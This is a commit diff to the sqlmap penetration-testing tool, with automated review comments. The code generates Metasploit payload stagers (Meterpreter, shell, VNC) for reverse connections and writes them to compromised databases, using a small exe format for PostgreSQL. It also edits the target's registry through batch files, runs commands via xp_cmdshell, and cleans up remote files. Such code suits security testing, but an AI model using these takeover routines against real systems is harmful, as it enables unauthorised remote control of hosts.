sqlmap 0.8-rc2: minor enhancement based on msfencode 3.3.3-dev -t exe-small so that PostgreSQL again supports the out-of-band connection via the Metasploit payload stager, as an option alongside in-memory shellcode execution via the sys_bineval() UDF. Speed up the OOB connect back. Clean up the target file system after --os-pwn too. Minor bug fix to correctly forge file system paths with os.path.join() all around. Minor code refactoring and user's manual update.

This commit is contained in:
Bernardo Damele
2009-12-17 22:04:01 +00:00
parent a605980d66
commit e4e081cdc6
12 changed files with 103 additions and 76 deletions


@@ -73,16 +73,16 @@ class Metasploit:
self.localIP = getLocalIP()
self.remoteIP = getRemoteIP()
self.__msfCli = os.path.normpath("%s/msfcli" % conf.msfPath)
self.__msfConsole = os.path.normpath("%s/msfconsole" % conf.msfPath)
self.__msfEncode = os.path.normpath("%s/msfencode" % conf.msfPath)
self.__msfPayload = os.path.normpath("%s/msfpayload" % conf.msfPath)
self.__msfCli = os.path.normpath(os.path.join(conf.msfPath, "msfcli"))
self.__msfConsole = os.path.normpath(os.path.join(conf.msfPath, "msfconsole"))
self.__msfEncode = os.path.normpath(os.path.join(conf.msfPath, "msfencode"))
self.__msfPayload = os.path.normpath(os.path.join(conf.msfPath, "msfpayload"))
self.__msfPayloadsList = {
"windows": {
1: ( "Meterpreter (default)", "windows/meterpreter" ),
3: ( "Shell", "windows/shell" ),
4: ( "VNC", "windows/vncinject" ),
2: ( "Shell", "windows/shell" ),
3: ( "VNC", "windows/vncinject" ),
},
"linux": {
1: ( "Shell", "linux/x86/shell" ),
@@ -254,7 +254,7 @@ class Metasploit:
break
elif askChurrasco == False:
elif askChurrasco is False:
logger.warn("beware that the VNC injection might not work")
break
@@ -361,7 +361,7 @@ class Metasploit:
def __forgeMsfConsoleResource(self):
self.resourceFile = "%s/%s" % (conf.outputPath, self.__randFile)
self.resourceFile = os.path.join(conf.outputPath, self.__randFile)
self.__prepareIngredients(encode=False, askChurrasco=False)
@@ -542,7 +542,7 @@ class Metasploit:
logger.info(infoMsg)
self.__randStr = randomStr(lowercase=True)
self.__shellcodeFilePath = "%s/sqlmapmsf%s" % (conf.outputPath, self.__randStr)
self.__shellcodeFilePath = os.path.join(conf.outputPath, "sqlmapmsf%s" % self.__randStr)
self.__initVars()
self.__prepareIngredients(encode=encode, askChurrasco=False)
@@ -592,10 +592,20 @@ class Metasploit:
self.__randStr = randomStr(lowercase=True)
if kb.os == "Windows":
self.exeFilePathLocal = "%s/sqlmapmsf%s.exe" % (conf.outputPath, self.__randStr)
self.__fileFormat = "exe"
self.exeFilePathLocal = os.path.join(conf.outputPath, "sqlmapmsf%s.exe" % self.__randStr)
# Metasploit developers added support for the old exe format
# to msfencode using '-t exe-small' (>= 3.3.3-dev),
# http://www.metasploit.com/redmine/projects/framework/repository/revisions/7840
# This is useful for sqlmap because on PostgreSQL it is not
# possible to write files bigger than 8192 bytes abusing the
# lo_export() feature implemented in sqlmap.
if kb.dbms == "PostgreSQL":
self.__fileFormat = "exe-small"
else:
self.__fileFormat = "exe"
else:
self.exeFilePathLocal = "%s/sqlmapmsf%s" % (conf.outputPath, self.__randStr)
self.exeFilePathLocal = os.path.join(conf.outputPath, "sqlmapmsf%s" % self.__randStr)
self.__fileFormat = "elf"
if initialize == True:
@@ -614,7 +624,7 @@ class Metasploit:
payloadStderr = process.communicate()[1]
if kb.os == "Windows":
payloadSize = re.search("size ([\d]+)", payloadStderr, re.I)
payloadSize = re.search("size\s([\d]+)", payloadStderr, re.I)
else:
payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
@@ -623,10 +633,18 @@ class Metasploit:
if payloadSize:
payloadSize = payloadSize.group(1)
exeSize = os.path.getsize(self.exeFilePathLocal)
packedSize = upx.pack(self.exeFilePathLocal)
# Only pack the payload stager if the back-end DBMS is not
# PostgreSQL because for this DBMS, sqlmap uses the
# Metasploit's old exe format
if self.__fileFormat != "exe-small":
packedSize = upx.pack(self.exeFilePathLocal)
else:
packedSize = None
debugMsg = "the encoded payload size is %s bytes, " % payloadSize
if packedSize and packedSize != exeSize:
if packedSize and packedSize < exeSize:
debugMsg += "as a compressed portable executable its size "
debugMsg += "is %d bytes, decompressed it " % packedSize
debugMsg += "was %s bytes large" % exeSize
@@ -666,6 +684,9 @@ class Metasploit:
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, func)
logger.debug(debugMsg)
if goUdf is False:
self.delRemoteFile(self.exeFilePathRemote, doubleslash=True)
def smb(self):
self.__initVars()
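Review bot: The two regex literals in the `@@ -614,7 +624,7 @@` hunk, `"size\s([\d]+)"` and `"Length\:\s([\d]+)"`, are plain (non-raw) strings, so `\s`, `\d` and `\:` are unrecognised escapes that only survive because the interpreter leaves them in place; newer Pythons warn about them. Write them as raw strings and drop the redundant character class and escaped colon: `payloadSize = re.search(r"size\s(\d+)", payloadStderr, re.I)` and `payloadSize = re.search(r"Length:\s(\d+)", payloadStderr, re.I)`. The enclosing method starts and ends outside the hunk.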


@@ -45,7 +45,7 @@ class Registry:
self.__randStr = randomStr(lowercase=True)
self.__batPathRemote = "%s/sqlmapreg%s%s.bat" % (conf.tmpPath, self.__operation, self.__randStr)
self.__batPathLocal = "%s/sqlmapreg%s%s.bat" % (conf.outputPath, self.__operation, self.__randStr)
self.__batPathLocal = os.path.join(conf.outputPath, "sqlmapreg%s%s.bat" % (self.__operation, self.__randStr))
if parse == True:
readParse = "FOR /F \"tokens=2* delims==\" %%A IN ('REG QUERY \"" + self.__regKey + "\" /v \"" + self.__regValue + "\"') DO SET value=%%A\r\nECHO %value%\r\n"
@@ -108,7 +108,7 @@ class Registry:
data = self.evalCmd(self.__batPathRemote, first)
self.delRemoteTempFile(self.__batPathRemote, bat=True)
self.delRemoteFile(self.__batPathRemote, doubleslash=True)
return data
@@ -124,7 +124,7 @@ class Registry:
logger.debug(debugMsg)
self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
self.delRemoteTempFile(self.__batPathRemote, bat=True)
self.delRemoteFile(self.__batPathRemote, doubleslash=True)
def delRegKey(self, regKey, regValue):
@@ -138,4 +138,4 @@ class Registry:
logger.debug(debugMsg)
self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
self.delRemoteTempFile(self.__batPathRemote, bat=True)
self.delRemoteFile(self.__batPathRemote, doubleslash=True)
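Review bot: In the first hunk the new `self.__batPathLocal = os.path.join(conf.outputPath, ...)` sits directly under `self.__batPathRemote`, which is still built with `"%s/sqlmapreg%s%s.bat" % (conf.tmpPath, ...)`; that asymmetry is presumably deliberate, since the remote path must follow the target's separator rather than the local OS, but nothing in the code says so and the commit message promises `os.path.join()` "all around". A one-line comment above the remote assignment, `# remote path: keep '/' formatting on purpose, os.path.join() would use the local OS separator`, would keep a later cleanup from breaking it. The identical `self.delRemoteFile(self.__batPathRemote, doubleslash=True)` cleanup is now repeated in three methods; a small private helper would keep the three call sites in step. The enclosing methods start outside the hunks.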


@@ -52,7 +52,7 @@ class UPX:
self.__upxPath = "%s/upx/macosx/upx" % paths.SQLMAP_CONTRIB_PATH
elif "win" in PLATFORM:
self.__upxPath = "%s/upx/windows/upx.exe" % paths.SQLMAP_CONTRIB_PATH
self.__upxPath = "%s\upx\windows\upx.exe" % paths.SQLMAP_CONTRIB_PATH
elif "linux" in PLATFORM:
self.__upxPath = "%s/upx/linux/upx" % paths.SQLMAP_CONTRIB_PATH
@@ -80,17 +80,17 @@ class UPX:
pollProcess(process)
upxStdout, upxStderr = process.communicate()
warnMsg = "failed to compress the file"
msg = "failed to compress the file"
if "NotCompressibleException" in upxStdout:
warnMsg += " because you provided a Metasploit version above "
warnMsg += "3.3-dev revision 6681. This will not inficiate "
warnMsg += "the correct execution of sqlmap. It might "
warnMsg += "only slow down a bit the execution of sqlmap"
logger.info(warnMsg)
msg += " because you provided a Metasploit version above "
msg += "3.3-dev revision 6681. This will not inficiate "
msg += "the correct execution of sqlmap. It might "
msg += "only slow down a bit the execution"
logger.debug(msg)
elif upxStderr:
logger.warn(warnMsg)
logger.warn(msg)
else:
return os.path.getsize(srcFile)
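Review bot: The new Windows path in the first hunk, `"%s\upx\windows\upx.exe" % paths.SQLMAP_CONTRIB_PATH`, is a non-raw string: `\u` is the start of a unicode escape (a syntax error under Python 3 or in any unicode literal) and `\w` is an unrecognised escape kept only by accident. It is also the one path this commit still assembles by string formatting while the rest moved to `os.path.join()`; `self.__upxPath = os.path.join(paths.SQLMAP_CONTRIB_PATH, "upx", "windows", "upx.exe")` yields the right separator on Windows with no escaping at all. The enclosing method starts outside the hunk.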


@@ -144,7 +144,7 @@ class xp_cmdshell:
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
self.delRemoteTempFile(tmpFile)
self.delRemoteFile(tmpFile)
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, sort=False, firstChar=first, lastChar=last)
inject.goStacked("DELETE FROM %s" % self.cmdTblName)